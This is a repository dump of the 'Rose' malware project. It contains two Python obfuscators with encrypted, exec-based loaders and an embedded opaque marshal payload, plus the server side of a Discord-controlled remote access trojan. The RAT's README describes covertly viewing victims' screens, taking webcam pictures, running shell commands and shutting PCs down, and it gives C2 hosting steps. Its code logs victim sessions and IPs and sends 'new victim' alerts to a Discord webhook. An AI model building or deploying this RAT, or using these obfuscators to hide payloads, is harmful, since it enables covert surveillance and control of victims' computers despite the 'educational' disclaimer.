<div id="about"></div>
## About :rose:
RoseGuardian is a powerful Python code obfuscator designed to safeguard your intellectual property. It employs advanced techniques to obscure your source code, making it significantly more challenging for potential reverse engineers to understand or modify.
<div id="features"></div>
## Features :sparkles:
- :closed_lock_with_key: Strong Class and Function Renaming
- :inbox_tray: Code Compression with zlib
- :package: Create Marshalized Objects
- :scroll: Remove Comments
<div id="usage"></div>
## Usage :rocket:
For optimal obfuscation, it is recommended to set the junk layers to 10 and utilize obfuscation method 1.
```bash
# Clone the project
$ git clone https://github.com/DamagingRose/RoseGuardian.git
# Navigate to project directory
$ cd RoseGuardian
# Run the project
$ python RoseGuardian.py <your_file> <junk_layers> <obfuscation_method>
```
<div id="todo"></div>
## Todo :pencil:
- [ ] Rename Variables and Parameters
- [ ] Remove Docstrings
- [ ] Add library support
<div id="examples"></div>
## Examples :clipboard:
**Command**:
```bash
# Obfuscates test.py with 2 junk layers and obfuscation method 1
$ python RoseGuardian.py test.py 2 1
```
**Before** (test.py):
```python
import random, string
import base64
def hello():
global var
var = 'hii' # hi
print(var)
print(random.choices(string.ascii_letters, k=5))
hello()
print(base64.b64encode(var.encode('utf-8')))
class banana(): # banana
ss = b'\nPEWPEW'
print(ss)
def counter(num):
for i in range(num):
print('dogs are cool!')
counter(5)
# lalala
```
**After** (obfuscated_test.py):
```python
__obfuscator__ = 'RoseGuardian'
__author__ = 'gumbobr0t'
__github__ = 'https://github.com/DamagingRose/RoseGuardian'
__license__ = 'EPL-2.0'
def complicated_function():
result = 0
for i in range(1, 11):
result += i**3 - i**2 + i
return result
class ComplicatedAlgorithm:
def __init__(self):
self._ = None
self.__ = None
def execute(self):
pass
def execute_complicated_algorithm():
_ = ComplicatedAlgorithm()
_._ = lambda _, __: _.___(__) + _.___(_.___(_.__(_.___(_.__))))
def analyze_data():
import random
data = [random.randint(1, 100) for _ in range(10)]
result = sum(data) / len(data)
import marshal, base64, zlib; exec(marshal.loads(zlib.decompress(base64.b64decode(b'eJxNkNFLwzAQxudr/orzKQ3MPm1DhD6piAxkIFgRQdI06W5rcyOXDfzvTdeADYHku3C/77vw4WaxwOFEIULQvqVhCRwD+k7kaqPZblZCiNY6IPdlXt/x4C6FehCQVtdTo3u46HCV6YQK5B5RXvUpoWKRqioRJjHZlGZPaCwXk1up2SD+9DZGG3gJx2qtlJjb5e4pTtlsVtYbau3ILvNVnqO7u5dKjWam18zwgbXZ6if/8jjFTaUKGvntd8912vOQzCpPuXVvu/r3k45D4c9DHtRRAAT04zd1dvbwT5AtdQw6WDBE/a0ceTPWWok/MtZvYw=='))))
def gravimetric_flux():
pass
class warp_inverter:
def __init__(self):
self._ = None
self.__ = None
def subspace_transducer(self, _):
return self.subspace_transducer(_)
def chronal_conduit():
_ = warp_inverter()
_._ = lambda _, __: _.___(__) + _.___(_.___(_.__(_.___(_.__))))
def singularity_stabilizer():
_ = gravimetric_flux()
_._ = lambda _, __: _.___(__) + _.___(_.___(_.__(_.___(_.__))))
def entropic_reactor():
pass
```
<div id="license"></div>
## License :page_facing_up:
This project is licensed under the EPL-2.0 license.
<div id="author"></div>
## Author :mortar_board:
Developed with :heart: by [gumbobrot](https://github.com/gumbobr0t)
<a href="#top">Back to top</a>

1280
Rose-Obfv1/RoseGuardian.py Normal file
View File

File diff suppressed because it is too large Load Diff

BIN
Rose-Obfv1/img.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 29 KiB

31
Rose-Obfv1/test.py Normal file
View File

@@ -0,0 +1,31 @@
import random, string
import base64
def hello():
global var
var = 'hii' # hi
print(var)
print(random.choices(string.ascii_letters, k=5))
hello()
print(base64.b64encode(var.encode('utf-8')))
class banana(): # banana
ss = b'\nPEWPEW'
print(ss)
def counter(num):
for i in range(num):
print('dogs are cool!')
counter(5)
# lalala

160
Rose-Obfv2/.gitignore vendored Normal file
View File

@@ -0,0 +1,160 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
cover/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
.pybuilder/
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
# For a library or package, you might want to ignore these files since the code is
# intended to run in multiple environments; otherwise, check them in:
# .python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# poetry
# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
# This is especially recommended for binary packages to ensure reproducibility, and is more
# commonly ignored for libraries.
# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
#poetry.lock
# pdm
# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
#pdm.lock
# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
# in version control.
# https://pdm.fming.dev/#use-with-ide
.pdm.toml
# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# pytype static type analyzer
.pytype/
# Cython debug symbols
cython_debug/
# PyCharm
# JetBrains specific template is maintained in a separate JetBrains.gitignore that can
# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
# and can be added to the global gitignore or merged into this file. For a more nuclear
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
#.idea/

21
Rose-Obfv2/LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2024 gumbobr0t
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

166
Rose-Obfv2/README.md Normal file
View File

File diff suppressed because one or more lines are too long

285
Rose-Obfv2/obfuscate.py Normal file
View File

@@ -0,0 +1,285 @@
__name__ = "rose_obfuscator"
__author__ = "gumbobr0t"
__version__ = "1.0.3"
from logging import INFO, DEBUG, getLogger, Formatter, FileHandler
from ast import (
parse,
unparse,
walk,
Name,
Assign,
ClassDef,
FunctionDef,
AsyncFunctionDef,
)
from random import choice
from string import ascii_letters, ascii_uppercase, digits, punctuation
from os import path, getcwd
from re import sub
from lzma import compress, decompress
from argparse import ArgumentParser
from colorlog import StreamHandler, ColoredFormatter
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
from base64 import urlsafe_b64encode, urlsafe_b64decode
log_format = "%(asctime)s [%(levelname)s] [%(module)s.%(funcName)s] %(message)s"
handler = StreamHandler()
handler.setFormatter(ColoredFormatter(log_format))
handler.setLevel(INFO)
file_handler = FileHandler("rose-obf.log", encoding="utf-8")
file_handler.setLevel(DEBUG)
file_formatter = Formatter(log_format)
file_handler.setFormatter(file_formatter)
root_logger = getLogger()
root_logger.addHandler(handler)
root_logger.addHandler(file_handler)
root_logger.setLevel(DEBUG)
def generate_key(length=16):
characters = ascii_letters + punctuation
key = "".join(choice(characters) for _ in range(length))
return key
def generate_random_string(length):
characters = ascii_uppercase + digits
return "".join(choice(characters) for _ in range(length))
def getCustom():
dec = choice([1, 2, 3])
if dec == 1:
return generate_pattern1()
elif dec == 2:
return generate_pattern2()
elif dec == 3:
return generate_pattern3()
def generate_pattern1():
return "__" + "".join(choice("O0") for _ in range(10))
def generate_pattern2():
return "__" + "".join(choice("0123456789") for _ in range(10)) + "__"
def generate_pattern3():
return "".join(choice("Il") for _ in range(15)) + "I"
def encryptData(text, key):
cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend())
encryptor = cipher.encryptor()
padder = padding.PKCS7(128).padder()
padded_data = padder.update(text.encode()) + padder.finalize()
ciphertext = encryptor.update(padded_data) + encryptor.finalize()
return urlsafe_b64encode(ciphertext).decode()
def decryptData(ciphertext, key):
cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend())
decryptor = cipher.decryptor()
decrypted_data = (
decryptor.update(urlsafe_b64decode(ciphertext)) + decryptor.finalize()
)
unpadder = padding.PKCS7(128).unpadder()
unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()
return unpadded_data.decode()
def process_node(node, name_dict):
if isinstance(node, Name) and node.id in name_dict:
node.id = name_dict[node.id]
def obfuscate_code(input_file):
with open(input_file, "r", encoding="utf-8", errors="ignore") as f:
content = f.read()
content = sub(r"\n\s*\n", "\n", content)
tree = parse(content)
name_dict = {}
root_logger.info(
"Renaming Classes, Functions, Arguments, Keyword Arguments and Variables..."
)
for node in walk(tree):
if isinstance(node, (FunctionDef, AsyncFunctionDef)):
old_name = node.name
new_name = getCustom()
root_logger.debug(
f"Function Name: {old_name} ---> New Function Name: {new_name}"
)
name_dict[old_name] = new_name
node.name = new_name
for arg in node.args.args:
old_arg_name = arg.arg
new_arg_name = getCustom()
root_logger.debug(
f"Argument Name: {old_arg_name} ---> New Argument Name: {new_arg_name}"
)
name_dict[old_arg_name] = new_arg_name
arg.arg = new_arg_name
for keyword in node.args.kwonlyargs:
old_kwarg_name = keyword.arg
new_kwarg_name = getCustom()
root_logger.debug(
f"Keyword Argument Name: {old_kwarg_name} ---> New Keyword Argument Name: {new_kwarg_name}"
)
name_dict[old_kwarg_name] = new_kwarg_name
keyword.arg = new_kwarg_name
elif isinstance(node, ClassDef):
old_name = node.name
new_name = getCustom()
root_logger.debug(f"Class Name: {old_name} ---> New Class Name: {new_name}")
name_dict[old_name] = new_name
node.name = new_name
for node in walk(tree):
if isinstance(node, Assign):
for target in node.targets:
if isinstance(target, Name):
old_var_name = target.id
new_var_name = getCustom()
root_logger.debug(
f"Variable Name: {old_var_name} ---> New Variable Name: {new_var_name}"
)
name_dict[old_var_name] = new_var_name
target.id = new_var_name
process_node(node, name_dict)
root_logger.info(
"Renaming of classes, functions, arguments, keyword arguments and variables done."
)
return unparse(tree)
key = [ord(char) for char in generate_key()]
decryptionFun = getCustom()
ciphertextParam = getCustom()
base64decodeVar = getCustom()
lzmadecompressVar = getCustom()
keyVar = getCustom()
cipherVar = getCustom()
decryptorVar = getCustom()
decrypted_textVar = getCustom()
unpadderVar = getCustom()
unpadded_dataVar = getCustom()
def replace_string(match):
s = match.group(1)
encrypted_string = encryptData(s, bytes(key))
encrypted_string = encrypted_string.replace("'", r"\'")
chr_format = "+".join([f"chr({ord(char)})" for char in repr(encrypted_string)])
b_format = [ord(char) for char in encrypted_string]
stage_1 = f"{decryptionFun}(eval({base64decodeVar}({urlsafe_b64encode(f'bytes({b_format})'.encode('utf-8'))})).decode(\"utf-8\"))"
stringified_stage_1 = str(urlsafe_b64encode(stage_1.encode("utf-8")))
stage_2 = f'eval({base64decodeVar}({stringified_stage_1}).decode("utf-8"))[1:-1]'
decrypted_string = decryptData(encrypted_string, bytes(key))
root_logger.debug(
f"String: {s} ---> Encrypted String: {encrypted_string} ---> Char Encrypted String: {chr_format} ---> Bytes Encrypted String: {b_format} ---> Evalized encoded string: {stage_2} ---> Aes Decrypted String: {decrypted_string}"
)
return stage_2
def obfuscate_strings(content):
root_logger.info("Encrypting strings...")
data = sub(r"(\'[^\']*\'|\"[^\"]*\")", replace_string, content)
root_logger.info("Encryption of strings done.")
return data
def main(input_file, output_file):
root_logger.debug("Entered main function.")
content = obfuscate_code(input_file)
with open(output_file, "w") as f:
data = "".join(
[
"from cryptography.hazmat.primitives.ciphers import Cipher,algorithms,modes\n",
"from cryptography.hazmat.primitives import padding\n",
"from cryptography.hazmat.backends import default_backend\n",
f"def {decryptionFun}({ciphertextParam}):\n",
f" {keyVar}=bytes({key})\n"
f" {cipherVar}=Cipher(algorithms.AES({keyVar}),modes.ECB(),backend=default_backend())\n",
f" {decryptorVar}={cipherVar}.decryptor()\n",
f" {decrypted_textVar}={decryptorVar}.update({base64decodeVar}({ciphertextParam}))+{decryptorVar}.finalize()\n",
f" {unpadderVar}=padding.PKCS7(128).unpadder()\n",
f" {unpadded_dataVar}={unpadderVar}.update({decrypted_textVar}) + {unpadderVar}.finalize()\n",
f" return {unpadded_dataVar}.decode()\n\n",
obfuscate_strings(content),
]
)
compressed_data = compress(
f'str({base64decodeVar}({urlsafe_b64encode(str(data).encode("utf-8"))}).decode("utf-8"))'.encode(
"utf-8"
)
)
data = f"from base64 import urlsafe_b64decode as {base64decodeVar};from lzma import decompress as {lzmadecompressVar};exec(eval({lzmadecompressVar}({compressed_data})))"
data = (
"""# Obfuscated with Rose\n# github.com/rose-dll\n\n# ^..^ /\n# /_/\_____/\n# /\ /\\\n# / \ / \\\n\n"""
+ data
)
f.write(data)
if __name__ == "rose_obfuscator":
parser = ArgumentParser(
description="Obfuscate Python code efficiently with Rose-obf."
)
parser.add_argument(
"-i",
"--input",
help="Input file name (required, .py)",
dest="in_file",
metavar="<input_file>",
required=True,
)
parser.add_argument(
"-o",
"--output",
help="Output file name",
dest="out_file",
metavar="<output_file>",
required=False,
)
args = parser.parse_args()
input_file = args.in_file
output_file = (
path.join(getcwd(), f"obf-{generate_random_string(10)}.py")
if args.out_file is None
else args.out_file
)
if input_file.endswith(".py"):
try:
root_logger.info(f"{input_file} ---> {output_file}...")
root_logger.debug("Entering main function.")
main(input_file, output_file)
root_logger.info(f"Done. {input_file} ---> {output_file}")
except Exception as e:
root_logger.error(f"Error: {e}")
else:
root_logger.error(
"Invalid Python file entered. Please make sure the file has a .py extension."
)

9
Rose-Obfv2/tests/obf-script.py Normal file
View File

File diff suppressed because one or more lines are too long

126
Rose-Obfv2/tests/script.py Normal file
View File

@@ -0,0 +1,126 @@
print("hello, world!\nHI")
print("wassup?!?!?!\nHI")
# Dictionaries are a key-value object in Python.
# Like sets, you create them using { and }, but unlike sets, they must be
# created as key-value pairs using the : symbol.
# The values used can be any object.
my_dictionary = {"banana": "$10.00", "cheese": True}
# Access items like with lists, except keys are usually strings.
my_dictionary["banana"] # returns the string '$10.00'
my_dictionary["cheese"] # returns True
# If accessing a key that doesn't exist using [ ], Python raises a KeyError.
# e.g. my_dictionary['optimus'] will raise a KeyError.
# Adding new items.
my_dictionary["optimus"] = "Truck"
# Changing existing items.
my_dictionary["cheese"] = False
# Get all the keys. (used for looping/iterating later on)
my_dictionary.keys()
# Get all the values.
my_dictionary.values()
# Get all the items (key-value pairs)
my_dictionary.items()
# See help(dict) for other methods.
for i in range(1, 10):
print(i)
# A tuple is a read-only data structure for storing collections that
# don't need to be changed. You create one using ( and ) characters.
# Create a tuple with ( and )
my_tuple = (1, 2, "hello", 3.14, False, "hello")
print(type(my_tuple))
# Access an item by index using [ and ]. Indexes start at 0
print(my_tuple[0])
print(my_tuple[3])
# Access a container from right-to-left
print(my_tuple[-1])
print(my_tuple[-3])
# Count number of items in a tuple
my_tuple.count("hello")
my_tuple.count(3.14)
my_tuple.count("blahblah")
# Search and get the index of an item
my_tuple.index("hello")
my_tuple.index(3.14)
my_tuple.index(False)
# Trying to change the value of an item in a tuple causes an error.
# Warning: If creating a tuple with only 1 item, you need to use this special syntax with a comma.
my_tuple2 = (42,)
type(my_tuple2) # is a 'tuple' type
# If you forget the comma, then Python doesn't create the tuple.
fake_tuple = 42
type(fake_tuple) # is an 'int' type
import random
import math
from functools import reduce
# Define a custom function to calculate factorial recursively
def factorial(n):
if n == 0:
return 1
else:
return n * factorial(n - 1)
# Generate a random list of numbers using list comprehension
random_numbers = [random.randint(1, 100) for _ in range(20)]
# Filter even numbers from the list
even_numbers = list(filter(lambda x: x % 2 == 0, random_numbers))
# Find square roots of all numbers in the list
square_roots = list(map(math.sqrt, random_numbers))
# Calculate the sum of all numbers in the list
total_sum = reduce(lambda x, y: x + y, random_numbers)
# Print the list of random numbers
print("Random numbers:", random_numbers)
# Print the list of even numbers
print("Even numbers:", even_numbers)
# Print the list of square roots
print("Square roots:", square_roots)
# Print the total sum of the numbers
print("Total sum:", total_sum)
# Generate a random dictionary with random keys and values
random_dict = {chr(random.randint(97, 122)): random.randint(1, 100) for _ in range(10)}
# Print the random dictionary
print("Random dictionary:", random_dict)
# Calculate the factorial of a random number
random_number = random.choice(random_numbers)
factorial_result = factorial(random_number)
# Print the factorial result
print("Factorial of {}: {}".format(random_number, factorial_result))

38
Rose-Remote-Access-Trojan/.github/ISSUE_TEMPLATE/bug_report.md vendored Normal file
View File

@@ -0,0 +1,38 @@
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Desktop (please complete the following information):**
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Smartphone (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS8.1]
- Browser [e.g. stock browser, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.

20
Rose-Remote-Access-Trojan/.github/ISSUE_TEMPLATE/feature_request.md vendored Normal file
View File

@@ -0,0 +1,20 @@
---
name: Feature request
about: Suggest an idea for this project
title: ''
labels: ''
assignees: ''
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

132
Rose-Remote-Access-Trojan/.gitignore vendored Normal file
View File

@@ -0,0 +1,132 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
.python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# PEP 582; used by e.g. github.com/David-OConnor/pyflow
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
test/
ratui/

21
Rose-Remote-Access-Trojan/LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 Rose
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

137
Rose-Remote-Access-Trojan/README.md Normal file
View File

@@ -0,0 +1,137 @@
### 🐍 PROJECT ENTIRELY DISCONTINUED NOW! YOU CAN FIND THE NEW VERSION OF ROSE MALWARE [HERE](https://github.com/0xrose/Rose-Stealer)
<h1 align="center">
<br>
<a href="https://github.com/0xrose/Rose-Stealer_old"><img src="https://raw.githubusercontent.com/0xrose/Rose-Stealer_old/main/resources/assets/rose.png" width=170 weigth=170></a>
<br>
Rose
<br>
</h1>
<div align="center">
<img src="https://img.shields.io/github/languages/top/0xrose/Rose-RAT?color=%23000000">
<img src="https://img.shields.io/github/stars/0xrose/Rose-RAT?color=%23000000&logoColor=%23000000">
<br>
<img src="https://img.shields.io/github/commit-activity/w/0xrose/Rose-RAT?color=%23000000">
<img src="https://img.shields.io/github/last-commit/0xrose/Rose-RAT?color=%23000000&logoColor=%23000000">
<br>
<img src="https://img.shields.io/github/issues/0xrose/Rose-RAT?color=%23000000&logoColor=%23000000">
<img src="https://img.shields.io/github/issues-closed/0xrose/Rose-RAT?color=%23000000&logoColor=%23000000">
<br>
</div>
<hr style="border-radius: 2%; margin-top: 60px; margin-bottom: 60px;" noshade="" size="20" width="100%">
<div align="center">
<h1>
A Discord RAT Extension for Rose 💀
</h1>
<strong>by <a href="https://github.com/ICExFS">pierro</a>, <a href="https://github.com/gumbobr0t">gumbobr0t</a>, <a href="https://github.com/suvan1911">suvan</a>, <a href="https://github.com/suegdu">suegdu</a></strong>
</div>
## <a id="content"></a> 🌐 〢 Table Of Contents
- **[📖 〢 Description](#description)**
- **[🔰 〢 Features](#features)**
- **[🔗 〢 Discord](https://discord.gg/Ts9RTFYvyt)**
- **[📥 〢 Install](#install)**
- **[💻 〢 Prerequisites](#prerequisites)**
- **[⚙ 〢 Setup](#setup)**
- **[📷 〢 Preview](#preview)**
- **[📚 〢 Changelog](#changelog)**
- **[🥷 〢 Contributors](#contributs)**
- **[⚠️ 〢 Bugs Or Errors](#bugsorerrors)**
- **[🧾 〢 License](#lisence)**
## <a id="description"></a> 📖 〢 Description
This is the server-side of Rose RAT. It will create a SocketIO Server to communicate between the victim's client & the attacker client.
This can be hosted on [repl.it](https://replit.com/account) or any other server. This is still under development and way more commands will be released soon.
# How is it working?
When a grabber created with [Rose](https://github.com/0xrose/Rose-Stealer_old) (with the RAT enabled) is opened, it'll try to connect to a SocketIO Server. # Note: This is outdated
The server will create a `SID` for the victim's client (which is a temporary ID) that is going to be deleted once the victim's client is shutdown.
The server will then send a WebHook that a victim has connected with his `IP` and his `SID` ([Preview](#preview))
Then, it'll wait for the Server command and execute it in the background.
Now, the attacker has to execute the `attacker_client.py` file.
The attacker's client will connect to the server and will be able to send command
The attacker can now write command in the GUI, then write the `SID` of the victim's PC he would like the command to be executed on.
The attacker's client sends the information to the server which sends it to the specified `SID`
Once a victim's client receives a command, it executes it and send a WebHook of the output if needed
## <a id="features"></a> 🔰 〢 Features
- `See the victim's pc screen on live (screenshare)`🟢
- `Make a Screenshot and send it (screenshot)`🟢
- `Make a MessageBox with any text (messagebox <text>)`🟢
- `Executing shell command (shell <text>)`🟢
- `Playing TTS (Text to speech) (voice <text>)`🟢
- `Changing the volume to 0%/100% (volumemax/volumezero)`🟢
- `Shutdown the PC (shutdown)`🟢
- `Make a Webcam PIC and send it (webcampic)`🟢
- `More commands will be released soon ... `🟣
🟢 = Working | 🟡 = To Do | 🟣 = Working on it | 🔴 = Not Working
### <a id="prerequisites"></a> 💻 〢 Prerequisites
- Windows 7/10/11
- **[Python](https://www.python.org)**
- PyPi requirements
- A [repl.it](https://replit.com/account) account (if you're hosting it on repl.it)
### <a id="setup"></a> ⚙️ Setup
* First, create a new [repl](https://replit.com/~) and use Python as principal language
* Download this repository as a zip and upload all the files to the repl
* Go back to your repl and click on `shell` in the top right corner
* Enter `pip install -r requirements.txt`
* Click on the `Run` green button at the top of the page
* Copy the URL
* Build a victim's client with [Rose-Grabber](https://github.com/0xrose/Rose-Stealer_old) using the URL you just copied
* Start `attacker_client.py` then paste the server URL
* Whenever a victim starts the grabber, a WebHook will be sent to inform you,
* You're now ready to execute commands.
## <a id="preview"></a> 📷 〢 Preview
When a victim's client connects:
![ConnectingEvents](readme/events.png)
The attacker's client UI:
![AttackerClient](readme/attacker_client.png)
An example of using the `shell dir` command:
![Exemple_command](readme/exemple_command.png)
## <a id="changelog"></a> 📚 〢 Changelog
All Notable Changes will be noted soon
## <a id="contributs"></a> 🥷 〢 Contributors
<a href="https://github.com/0xrose/Rose-RAT/graphs/contributors">
<img src="https://contrib.rocks/image?repo=0xrose/Rose-RAT" />
</a>
## <a id="bugsorerrors"></a> ⚠️ Bugs Or Errors?
- To Report An Error Make An **[Issue](https://github.com/0xrose/Rose-RAT/issues)**
- Or Join The **[Discord](https://discord.gg/Ts9RTFYvyt)**
## <a id="lisence"></a> License
This program, is intended solely for educational purposes, to demonstrate the vulnerabilities of computer systems and to promote awareness of cybersecurity. The program should only be used in controlled environments with explicit permission from the system owner.
While the program may be used to assess the security of computer systems, it should not be used for malicious purposes or any activity that may cause harm or damage to computer systems or networks. Any misuse or illegal activity resulting from the use of this program is strictly prohibited and the responsibility lies solely with the user.
The author of this program is not liable for any damage, harm, or legal consequences resulting from the use or misuse of this program. By using this program, you acknowledge that you understand the potential risks and agree to assume full responsibility for any actions taken using the program.
### Rose RAT is licensed under the <a href="https://mit-license.org/.">MIT License</a>
### This is for educational purposes only. Use at your own risk. We are not responsible for any of your actions!

38
Rose-Remote-Access-Trojan/_data.py Normal file
View File

@@ -0,0 +1,38 @@
import sqlite3
class DatabaseX():
def __init__(self):
self.conn = sqlite3.connect('sessions.db')
self.c = self.conn.cursor()
def get_webhook(self, sid):
self.c.execute("SELECT webhook FROM ses WHERE sid=?", (sid, ))
return self.c.fetchone()[0]
def get_ip(self, sid):
self.c.execute("SELECT ip FROM ses WHERE sid=?", (sid, ))
return self.c.fetchone()[0]
def enter_values(self, sid, ip, username, server, webhook, avatar, footer):
self.c.execute("INSERT INTO ses VALUES (?, ?, ?, ?, ?, ?, ?)",
(sid, ip, username, server, webhook, avatar, footer))
self.conn.commit()
return
def get_all(self, sid):
self.c.execute("SELECT * FROM ses WHERE sid=?", (sid, ))
return self.c.fetchone()
def delete_sid(self, sid):
self.c.execute("DELETE FROM ses WHERE sid=?", (sid, ))
self.conn.commit()
return
def get_sessions(self):
self.c.execute("SELECT * FROM ses")
return len(self.c.fetchall())
db = DatabaseX()

53
Rose-Remote-Access-Trojan/_webhook.py Normal file
View File

@@ -0,0 +1,53 @@
from dhooks import Webhook as web
from dhooks import Embed
class Weboh():
def on_connect(self, **kwargs):
ip = kwargs.get('ip')
username = kwargs.get('username')
server = kwargs.get('server')
webhook = kwargs.get('webhook')
avatar = kwargs.get('avatar')
footer = kwargs.get('footer')
sid = kwargs.get('sid')
embed = Embed(
description='New victim connected to server',
color=11795068,
timestamp='now' # sets the timestamp to current time
)
embed.set_author(name="Discord RAT Connected!", icon_url=avatar)
embed.set_footer(text=footer, icon_url=avatar)
embed.add_field(name="IP:", value=f'`{ip}`')
embed.add_field(name="Name", value=f'`{username}`')
embed.add_field(name='Server:', value=f'[{server}]({server})')
embed.add_field(name='Client ID:', value=f'`{sid}`')
webx = web(webhook)
webx.send(embed=embed)
def on_disconnect(self, **kwargs):
ip = kwargs.get('ip')
username = kwargs.get('username')
server = kwargs.get('server')
webhook = kwargs.get('webhook')
avatar = kwargs.get('avatar')
